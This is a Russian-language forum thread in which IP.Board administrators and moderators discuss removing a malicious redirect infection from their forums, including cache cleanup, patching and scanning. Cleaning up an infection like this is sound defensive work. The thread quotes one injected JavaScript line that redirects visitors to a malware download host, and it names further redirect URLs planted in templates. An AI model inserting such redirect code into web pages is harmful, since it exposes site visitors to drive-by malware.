Перейти к содержимому
Русский язык для Invision Community 5

Яндекс обнаружил вредоносный код на форуме

Вопрос такой: на днях Яндекс сообщил мне, что мой сайт заражен вредоносным кодом.

 

Я полез в Яндекс.Вебмастер, который мне сообщал, что вердикт мне вынесен "Поведенческий анализ"

А именно:

 

Поведенческий анализ

 

Антивирусный робот Яндекса при проверке страниц анализирует поведение JavaScript-кода и других активных элементов. Если поведение совпадает с эвристическими правилами, характерными для drive-by-download атак, например, детектор вредоносных Java апплетов или детектор вредоносных PDF документов обнаруживают попытку эксплуатации уязвимости для выполнения вредоносного кода, то принимается решение о том, что проверяемая страница является опасной для посетителей.

 

Я, если честно, так и не понял что с этим делать и что и где искать. По всем остальным вердиктам хоть что-то понятно.

 

Написал вопрос в саппорт, ответ был следующим:

 

На Вашем сайте с помощью url: sport-horse.pro/index.php?ipbv=e13484a4543e54a53b72269a15c16faa&g=js периодически подгружается следующее вредоносное содержимое:

document.location='http://filestore321.com/download.php?id=6de46215' 

 

Действительно такая похожая ссылка на страницах форума встречается, но аналогичные ссылки есть в кодах страниц на других форумах.

В общем я в тупике и не понимаю в какую сторону мне рыть.

 

Делаю полный бекап форума на локалку и мыслю проверить какими-то антивирусами.

Попробовал прогнать сайт по известным мне онлайн-проверяльщикам - никто ничего не нашел.

 

Может кто-то направить добрым советом в нужную сторону? Был бы крайне признателен за помощь.

Рекомендованные сообщения

Скажите, если заново переустановлю форум и накачу на него бекап БД. Естественно пароли к БД и админке сменю.

Вирус уйдет? Какие мысли?

 

Если нет модулей и тд. Можно все удалить кроме папки uploads, config_global.php, файлов шаблона (картинок), смайлов.

 

И произвести обновление форума.

 

Если есть модули, просто в свежий дистрибутив их загрузить.

 

И после, снова поменять пароли.

БД использовать напрямую из MySQL или можно сделать бекап форума внутренними средствами IPB?

Как правильней с точки зрения безопастности?

Скажите, если заново переустановлю форум и накачу на него бекап БД. Естественно пароли к БД и админке сменю.

Вирус уйдет? Какие мысли?

Лечение - это комплексный подход, классическая схема которая описана на первой странице темы. Методы лечения были разработаны специалистами согласно этиологии и патогенеза вируса и клинически доказаны. Не занимайтесь самолечением ©.

 

По факту - "заново" переустановить форум есть смысл при установке новой версии со всеми патчами безопасностями, так как вирус сидит в кеше (если речь идет об этом вирусе) и для его удаления не обязательно переустанавливать форум.

Странно...

Установил тестово на другом сайте IPB, подключился к старой БД, скопировалось все скин, в админке видны старые приложенния и хуки(хотя на сайте их не видно). Как бы не скопировался еще и вирус...

Странно...

Установил тестово на другом сайте IPB, подключился к старой БД, скопировалось все скин, в админке видны старые приложенния и хуки(хотя на сайте их не видно).

@Valeon, что вам даст "переустановка" форума? В лечении вируса, будь то человеческом или компютерном, нужно исходить из его патогенеза. Благо этот вирус хорошо изучен (условное название "редирект на filestore321 в ipb") - известен способ заражения, его структура и производимые им действия. На основе этих факторов и был разработан метод лечения, который не просто так взят с потолка. Прислушайтесь к советам специалистов, зачем вы спрашиваете "поможет ли мне переустановка форума" и занимаетесь херней, когда есть "официальный" способ лечения с протоколом действий? Вы, простите, вообще тему читали?

 

Ничего вам переустановка не даст, так как с таким же успехом можно просто обновить кеш стилей и вирус сбросится из временных файлов кеша. Но это не защитит от повторного заражения через ту же самую уязвимость.

"Переустановку" делается при удаление старого форума и установка нового последней версии со всеми патчами безопасностями.

В вашем случае проводится обновление последней версии форума для устранения уязвимостей (либо установка всех патчей безопасности на существующем без обязательной переустановки). А далее все также согласно инструкции.

Ну я вообщето так и установил. )))

Вирус нашел спасибо! )))

Я думал это частный случай и мысли не было что все болееют одной болячкой. Поэтому и не обратил внимание на конретно этот вирус.

Достаточно поставить последний патч или нужно ставить все с момента установки форума?

Достаточно поставить последний патч или нужно ставить все с момента установки форума?

Все последующие после релиза вашей версии. Критическим является не только последний.

  • 2 недели спустя...

Добрый день! Заражение произошло на 3.4.6, у меня проблема осложнена тем , что сильно нарушился функционал админки. Вылетает ошибка JavaScript при попытке открыть шаблон. Нельзя поменять текущий шаблон на импротированный. Я нашел шаблоны в БД, но не нашел в них вредоносного кода, кеш вроде как перестраивается, но это не помогает. Выложенным ранее скриптом scan.php понаходил вредоносный код в десятке файлов и удалил (даже в conf_global.php сидел). Обновился до 3.4.7 - вирь осталося, до 3.4.8 - вирь осталося, только поползло окно залогинивания за пределы экрана, вообще ппц теперь. Уже не знаю что делать. Сносить все файлы и подгружать старую БД?

Вам нужно выполнить действия которые описаны в инструкции. Если видите что не справляетесь с вирусом и форум сильно заражен, лучше выполнить обновление форума с полным удалением файлов старой версии или обратится к специалистам.

Вам нужно выполнить действия которые описаны в инструкции. Если видите что не справляетесь с вирусом и форум сильно заражен, лучше выполнить обновление форума с полным удалением файлов старой версии или обратится к специалистам.

Спасибо за ответ. Я, может не правильно выразился, но действия по инструкции не помогают. Эту тему я перечитал несколько раз полностью. Уже и копировал весь форум на комп для проверки айболитом, но в файлах кеша он ничего не находит в продвинутом режиме. И просматривал conf_global.php - он чист. Наверное вирус более хитрый. Ладно, буду устанавливать всё с нуля.

Наверное вирус более хитрый.
Вы хотя бы написали, как он себя проявляет.

А то "следов не вижу, только окно авторизации поплыло"

Конкретно этот вирус работу js скриптов не нарушает. Если есть проблемы с их загрузкой, тогда возможно у вас другой случай заражения и лечение требует иного подхода. Чтобы о чем-то говорить, как минимум нужно показать адрес форума, привести данные каким образом вирус себя проявляет, изучать исходный код и результат работы сканеров.

  • 3 месяца спустя...

Тоже в конце августа подхватил такой вирус с переездом с места на место. Именно этот описанный в начале обнаружился только в кэше на сервере, сами шаблоны были чистые. Похоже через админку внесли изменения в includeJS, перекэшировали и удалили их из админки. Видно через уязвимости угнали пароли админов, т.к. после того как удалил код и поставил все заплатки, которые вывесили на 3.4.6, на следующий же день увидел неудачную попытку залогиниться в админке с IP из Техаса.

Спустя почти месяц яндекс в итоге снял пометку с сайта, о том что на нём вредоносный код.Но тут внял жалобам пользователей и проверил через айфон, работает ли вход, что самое интересное, если входил через вай-фай, то всё работало отлично, но как только заходил через мобильный инет, то тутже работала переадресация на shockwavepub.ru, а оттуда еще на несколько сайтов. Начал смотреть стиль IP.mobile, обнаружился незашифрованный скрипт со ссылкой на этот ресурс в глобальном шаблоне стиля.

Вроде вздохнул спокойно, но начал копаться дальше, еще вписан где-то код с переадрессацией на эплстор (https://admin.appnext.com/ClickUrl.html?id=2f50022d-9f04-4fae-b59a-9175e731d3a2&pbk=wNGLJOFEDTRD3AFNGBFJL0EC&subid=b59c4a85-ee07-41d1-b5ed-89b8c8a46e25), но он проявляется только при попытке зарегистрироваться или в свободном разделе, когда пытаешься оставить сообщение как гость, т.е. переадресация случается в том месте где появляется sweetcaptcha. Вот только не могу найти где именно лежит либо форма регистрации (ответа), либо файл капчи, чтобы поискать код. Айболит чего-то мне не помог и не нашёл эту закладку.

Если редирект в шаблоне, скачайте файлы шаблона (регистрации и пр) и просмотреть их вручную - либо поиском по соответствующем функциям.

Создайте аккаунт или войдите в него для комментирования

Важная информация

При использовании данного сайта, вы согласаетесь с Условия использования и Чтобы сделать этот веб-сайт лучше, мы разместили cookies на вашем устройстве. Вы можете изменить свои настройки cookies, в противном случае мы будем считать, что вы согласны с этим..

Аккаунт

Навигация

Поиск

Поиск

Настроить push-уведомления браузера

Chrome (Android)
  1. Нажмите на иконку замка рядом с адресной строкой.
  2. Нажмите Права доступа -> Уведомления.
  3. Измените свои настройки.
Chrome (компьютер)
  1. Нажмите на иконку замка в адресной строке.
  2. Выберите Настройки сайта.
  3. Найдите Уведомления и измените свои настройки.